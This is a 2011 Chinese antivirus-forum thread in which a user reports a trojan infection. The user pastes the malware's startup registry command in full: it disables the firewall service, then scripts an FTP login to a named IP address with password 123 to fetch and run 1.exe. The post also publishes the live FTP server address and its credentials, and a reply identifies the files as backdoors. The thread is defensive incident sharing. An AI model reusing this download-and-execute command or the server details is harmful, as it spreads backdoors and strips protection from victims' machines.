瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 病毒ftp网址ftp://61.164.117.80/ 用户密码都是123
tgjxzl - 2011-6-24 10:02:00
昨天上网种了病毒,
发现该病毒会在注册表的开机启动建立一个项:
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[shell]
注册表内容:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 61.164.117.80> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi
进程:D:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

在C盘的system32下建立一个isql的文件夹,然后从 61.164.117.80下载木马到isql下
现在用 ftp://61.164.117.80/ 用户密码都是123还可以登录,登录后可以看到木发1.exe,2.exe,4.exe ,lpk.dll

用户系统信息:Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.8.131 Version/11.11
ihaveadream - 2011-6-27 17:27:00
楼主强悍。
baohe - 2011-6-27 17:55:00


引用:
原帖由 tgjxzl 于 2011-6-24 10:02:00 发表
昨天上网种了病毒,
发现该病毒会在注册表的开机启动建立一个项:
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\[shell]
注册表内容:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 61.164.117.8



两只烂鸽子。其中1.exe还有假冒的数字签名(经不起查看)。
释放的文件为:


1.exe——————C:\SERVER.EXE


360safe——————c:\ programfiles\lsass.exe 


以上两只鸽子均不能在我的WIN7系统中运行:kaka6:


删除了事。









吴文和 - 2011-6-28 13:38:00
http://bbs.ikaka.com/showtopic-8987187-3.aspx  楼主中的病毒和我的一样嘛。
ainika - 2011-6-28 14:29:00
FTP登陆不上去。连接被虫豸。
1
查看完整版本: 病毒ftp网址ftp://61.164.117.80/ 用户密码都是123